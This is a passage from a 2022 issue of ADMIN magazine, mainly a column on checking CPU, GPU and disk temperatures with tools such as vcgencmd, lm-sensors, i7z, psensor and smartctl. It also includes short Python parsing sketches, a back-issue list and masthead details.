[11] Kibana defaults: [https://www.elastic.co/guide/en/kibana/current/settings.html]
[12] Morpheus: [https://developer.NVIDIA.com/morpheus-cybersecurity]

The Author
Jeff Layton has been in the HPC business for over 30 years (starting when he was 4 years old). When he's not grappling with a stubborn systemd script, he's looking for deals for his home cluster. His Twitter handle is @JeffdotLayton.

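The unbalanced-dataset situation the article describes can be made concrete with a short, hypothetical sketch. This is not code from the article: it computes inverse-frequency class weights for a transaction dataset with millions of legitimate records and a handful of fraudulent ones, the kind of weighting many training frameworks accept so the rare class is not simply ignored. The function name and the toy label values are illustrative assumptions.

```python
from collections import Counter

def class_weights(labels):
    """Compute inverse-frequency weights, normalized so the most
    common class gets weight 1.0. Rare classes receive large weights,
    which a loss function can use to emphasize them during training."""
    counts = Counter(labels)
    most_common = max(counts.values())
    return {cls: most_common / n for cls, n in counts.items()}

# A toy stand-in for millions of transactions: 0 = legitimate, 1 = fraudulent.
labels = [0] * 1_000_000 + [1] * 4
weights = class_weights(labels)
print(weights[0])  # 1.0
print(weights[1])  # 250000.0
```

With weights like these, each fraudulent example contributes as much to the loss as 250,000 legitimate ones; the inverted approach described above – modeling the majority class and flagging whatever doesn't fit – is the other common answer to the same imbalance.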
NUTS AND BOLTS: Performance Tuning Dojo

System temperature as a dimension of performance

Heat Seeker

Sensor tools can provide highly variable data from CPUs, GPUs, and a variety of sources. We look at some tools to verify the temperature of components on diverse hardware. By Federico Lucifredi

Excessive or just elevated temperature is sometimes the source of unexpected behavior in computing components – I faced it firsthand once, with runaway CPU heat burning through an older Slot 1 Pentium 3 processor. The cause was a detached heat sink, and some older hardware did not have built-in protection circuitry back then. I have also had fun experiencing intriguing boot failures from an overheating hard drive in a system equipped with one too many peripherals. In recent times I have taken a more preemptive stance, monitoring the heat build-up in a Raspberry Pi cluster as the case fan was replaced (Figure 1) [1]. To silence a desktop cluster, I replaced the built-in fan with a slower, silent fan made by specialty vendor Noctua [2]. Because the newer fan used fewer revolutions per minute to get the job done, I had to verify that the temperature inside the case remained roughly the same after the change:

vcgencmd measure_temp

Figure 1: Raspberry Pi 4 Picocluster in testing.
Figure 2: vcgencmd extracting temperature and voltage information from a Raspberry Pi GPU. Note the use of parallel SSH syntax to access all nodes in a cluster.
Lead Image © Lucy Baldwin, 123RF.com

The output quickly demonstrated that the temperature remained within the same range it had with the older fan. The vcgencmd utility is a tool made by Broadcom to access the state of the VideoCore GPU found on all Raspberry Pi boards [3]. It can also provide insight into voltage levels for cores and SDRAM, among other things, which can come in handy


while troubleshooting heat problems (Figure 2).

Terminal UI Redux

Returning to a common topic on these pages, an interesting example of a terminal user interface (TUI) [4] for the Mac is the istats tool (install from Ruby Gems with gem install iStats) [5]. iStats provides convenient access to temperature, battery, and fan speed data on macOS systems (Figure 3). Its simple and easy-to-use interface belies a hidden complexity. The istats scan command will look for additional "keys" of sensor data available on a given system and offer to enable them at the user's discretion (Figure 4).

Figure 3: iStats at work on a Mac. The chart of the number of battery cycles of this old battery is actually blinking in red!
Figure 4: iStats scanning sensors available on an older MacBook Pro. Not all values discovered are temperatures.
Figure 5: glances presents temperature data on its left-hand panel whenever it is available.

On Linux, my default choice for in-terminal monitoring TUI is glances [6], which I have examined previously for its many capabilities [7]. Yet, I did not look at its temperature module, an oversight Figure 5 now aims to remedy. Data is sourced from the sensors [8] command (apt install lm-sensors), which is a configurable, consistent command-line interface gathering the multitude of sensor data exposed by a disparate array of Linux kernel modules (Listing 1; from the same system on which glances was run). Indeed, if this tour of sensor tools and interfaces has shown one thing, it is that the variety of


sensor data available is highly variable. Ranging from a Raspberry Pi, to a vintage MacBook Pro, to an HP Microserver, every system has provided different datasets. Often the biggest challenge is correctly identifying the source of the data, which can originate in a CPU, a GPU, a management card, and a variety of alternative sources.

Listing 1: sensors Output

  federico@ferenginar:~$ sensors
  k10temp-pci-00c3
  Adapter: PCI adapter
  temp1:  +42.5°C  (high = +70.0°C)
                   (crit = +100.0°C, hyst = +95.0°C)

  federico@ferenginar:~$

Let There Be Dell

Switching to a fourth system, this one running Linux on an Intel processor, I can make use of i7z [9], a tool explicitly written to visualize the state of Intel processors – including their temperature. Figure 6 shows the results on an Intel Core-equipped laptop. The more general purpose solution is to configure lm-sensors to include kernel modules for all sensors available, which is done through the sensors-detect command in a way akin to what was previously described for iStats. With lm-sensors, you can actually configure the kernel to load the correct modules at boot time, as recently described by our own Bruce Byfield in sister publication Linux Magazine [10]. Once this configuration step is successfully accomplished, all data for a specific system becomes available in the usual filesystem locations (usually in /sys/), ready to be consumed by higher level programs (Figure 7).

Figure 6: i7z at work, constantly refreshing CPU state data, including temperatures.
Figure 7: The complete range of sensors available on a Dell XPS 13 9360 "Sputnik."
Figure 8: psensor charting some of the sensors listed in Figure 7.

Listing 2: Extracting Temperature Data

  federico@voronoi:~$ sudo smartctl -A /dev/nvme0 | grep Temperature
  [sudo] password for federico:
  Temperature: 42 Celsius
  Warning Comp. Temperature Time: 16
  Critical Comp. Temperature Time: 28
  Temperature Sensor 1: 42 Celsius
  federico@voronoi:~$

One such example is psensor [11], a GUI application charting select metrics and sensors to facilitate time series analysis. Not perfectly polished in its windowing toolkit interactions,


at least in Ubuntu 22.04, it nonetheless remains the best option currently available (Figure 8).

Disk Sensors

The all-purpose smartctl utility offers storage device temperature data (apt install smartmontools) [12] equally well for spinning media and solid-state NVMe storage (Listing 2; from a persistent storage SMART source). It is generally advisable to maintain storage media under 60°C (140°F), with the actual drive's specification having the final say.

Info
[1] Sound-proofing a Picocluster: [https://twitter.com/0xF2/status/1244422315011645444]
[2] Noctua NF-A6x25 PWM, Premium Quiet Fan, 4-Pin (60mm): [https://www.amazon.com/gp/product/B00VXTANZ4/]
[3] vcgencmd on Embedded Linux: [https://elinux.org/RPI_vcgencmd_usage]
[4] "Network Performance In-Terminal Graphics Tools" by Federico Lucifredi, ADMIN, issue 51, 2019, pg. 94, [https://www.admin-magazine.com/Archive/2019/51/Network-performance-in-terminal-graphics-tools]
[5] Christophe Naud-Dulude, iStats: [https://github.com/Chris911/iStats]
[6] Nicolas Hennion, glances: [https://github.com/nicolargo/glances]
[7] "Next-Generation Terminal UI Tools" by Federico Lucifredi, ADMIN, issue 64, 2021, pg. 93, [https://www.admin-magazine.com/Archive/2021/64/Next-generation-terminal-UI-tools]
[8] lm-sensors repository: [https://github.com/lm-sensors/lm-sensors]
[9] Abhishek Jaiantilal, i7z: [https://github.com/ajaiantilal/i7z]
[10] "Taking Your Hardware's Temperature" by Bruce Byfield, Linux Magazine, issue 261, August 2022, pg. 44, [https://www.linuxpromagazine.com/Issues/2022/261/Beat-the-Heat]
[11] Francis Chin, psensor: [https://github.com/chinf/psensor]
[12] smartmontools: [https://github.com/smartmontools/smartmontools/]

Author
Federico Lucifredi (@0xf2) is the Product Management Director for Ceph Storage at Red Hat and formerly the Ubuntu Server Product Manager at Canonical and the Linux "Systems Management Czar" at SUSE. He enjoys arcane hardware issues and shell-scripting mysteries and takes his McFlurry shaken, not stirred. You can read more from him in the new O'Reilly title AWS System Administration.
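The command output shown throughout this column is easy to post-process when you want to log or alert on temperatures across a whole cluster. The sketch below is a hedged illustration, not code from the article: it parses the temp=48.3'C style of line that vcgencmd measure_temp prints on a Raspberry Pi and the "Temperature: 42 Celsius" lines from the smartctl output in Listing 2. The function names are my own, and the regular expressions assume only the output formats shown here.

```python
import re

def parse_vcgencmd(line):
    """Extract degrees Celsius from vcgencmd measure_temp output,
    e.g. "temp=48.3'C" -> 48.3. Returns None if the line doesn't match."""
    m = re.search(r"temp=([\d.]+)'C", line)
    return float(m.group(1)) if m else None

def parse_smartctl(text):
    """Collect every "Temperature...: N Celsius" reading from
    smartctl -A output, as seen in Listing 2."""
    return [int(v) for v in
            re.findall(r"Temperature.*?:\s+(\d+)\s+Celsius", text)]

print(parse_vcgencmd("temp=48.3'C"))  # 48.3
print(parse_smartctl("Temperature: 42 Celsius\n"
                     "Temperature Sensor 1: 42 Celsius"))  # [42, 42]
```

A threshold check – say, against the 60°C guideline mentioned above – then becomes a one-line comparison, whether the reading came from a Raspberry Pi GPU or an NVMe drive.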
SERVICE: Back Issues

ADMIN Network & Security NEWSSTAND

Order online: bit.ly/ADMIN-Newsstand

ADMIN is your source for technical solutions to real-world problems. Every issue is packed with practical articles on the topics you need, such as security, cloud computing, DevOps, HPC, storage, and more! Explore our full catalog of back issues for specific topics or to complete your collection.

#71 – September/October 2022


Kubernetes
We show you how to get started with Kubernetes, and users share
their insights into the container manager.
On the DVD: SystemRescue 9.04

#70 – July/August 2022


Defense by Design
Nothing is so true in IT as “Prevention is better than the cure.” We
look at three ways to prepare for battle.
On the DVD: Rocky Linux 9 (x86_64)

#69 – May/June 2022


Terraform
After nearly 10 years of work on Terraform, the HashiCorp team
delivers the 1.0 version of the cloud automation tool.
On the DVD: Ubuntu 22.04 "Jammy Jellyfish" LTS Server Edition

#68 – March/April 2022


Automation in the Enterprise
Automation in the enterprise extends to remote maintenance, cloud orchestration, and network hardware.
On the DVD: AlmaLinux 8.5 (minimal)

#67 – January/February 2022


systemd Security
This issue, we look at how to secure systemd services and its
associated components.
On the DVD: Fedora 35 Server (Install)

#66 – November/December 2021


Incident Analysis
We look at updating, patching, and log monitoring container apps
and explore The Hive + Cortex optimization.
On the DVD: Ubuntu 21.10 “Impish Indri” Server Edition

SERVICE: Contact Info / Authors

WRITE FOR US
ADMIN: Network and Security is looking for good, practical articles on system administration topics. We love to hear from IT professionals who have discovered innovative tools or techniques for solving real-world problems.
Tell us about your favorite:
• interoperability solutions
• practical tools for cloud environments
• security problems and how you solved them
• ingenious custom scripts
• unheralded open source utilities
• Windows networking techniques that aren't explained (or aren't explained well) in the standard documentation
We need concrete, fully developed solutions: installation steps, configuration files, examples – we are looking for a complete discussion, not just a "hot tip" that leaves the details to the reader.
If you have an idea for an article, send a 1-2 paragraph proposal describing your topic to: edit@admin-magazine.com.

Contact Info
Editor in Chief: Joe Casad, jcasad@linuxnewmedia.com
Managing Editors: Rita L Sooby, rsooby@linuxnewmedia.com; Lori White, lwhite@linuxnewmedia.com
Senior Editor: Ken Hess
Localization & Translation: Ian Travis
News Editor: Amber Ankerholz
Copy Editors: Amy Pettle, Aubrey Vaughn
Layout: Dena Friesen, Lori White
Cover Design: Dena Friesen, Illustration based on graphics by Jakarin Niamklang, 123RF.com
Advertising: Brian Osborn, bosborn@linuxnewmedia.com, phone +49 8093 7679420
Publisher: Brian Osborn
Marketing Communications: Gwen Clark, gclark@linuxnewmedia.com
Linux New Media USA, LLC, 4840 Bob Billings Parkway, Ste 104, Lawrence, KS 66049 USA
Customer Service / Subscription:
For USA and Canada: Email: cs@linuxnewmedia.com, Phone: 1-866-247-2802 (Toll Free from the US and Canada)
For all other countries: Email: subs@linuxnewmedia.com
www.admin-magazine.com

Authors
Amber Ankerholz 6
Ulrich Bantle 10
Klaus Bierschenk 64
Chris Cowen 80
Ken Hess 3
Christian Knermann 40
Petros Koutoupis 84
Felix Kronlage-Dammers 20
Martin Kuppinger 76
Jeff Layton 88
Martin Gerhard Loschwitz 14, 24, 50
Federico Lucifredi 93
Ali Imran Nagori 46
Akshat Pradhan 58
Dr. Holger Reibold 36
Andreas Stolzenberger 30, 70
Matthias Wübbeling 56, 62

While every care has been taken in the content of the magazine, the publishers cannot be held responsible for the accuracy of the information contained within it or any consequences arising from the use of it. The use of the DVD provided with the magazine or any material provided on it is at your own risk.
Copyright and Trademarks © 2022 Linux New Media USA, LLC.
No material may be reproduced in any form whatsoever in whole or in part without the written permission of the publishers. It is assumed that all correspondence sent, for example, letters, email, faxes, photographs, articles, drawings, are supplied for publication or license to third parties on a non-exclusive worldwide basis by Linux New Media unless otherwise stated in writing.
All brand or product names are trademarks of their respective owners. Contact us if we haven't credited your copyright; we will always correct any oversight.
Printed in Nuremberg, Germany by Zeitfracht GmbH. Distributed by Seymour Distribution Ltd, United Kingdom.
ADMIN is published bimonthly by Linux New Media USA, LLC, 4840 Bob Billings Parkway, Ste 104, Lawrence, KS 66049, USA (Print ISSN: 2045-0702, Online ISSN: 2831-9583). November/December 2022. Periodicals Postage paid at Lawrence, KS. Ride-Along Enclosed. POSTMASTER: Please send address changes to ADMIN, 4840 Bob Billings Parkway, Ste 104, Lawrence, KS 66049, USA.
Represented in Europe and other territories by: Sparkhaus Media GmbH, Bialasstr. 1a, 85625 Glonn, Germany.
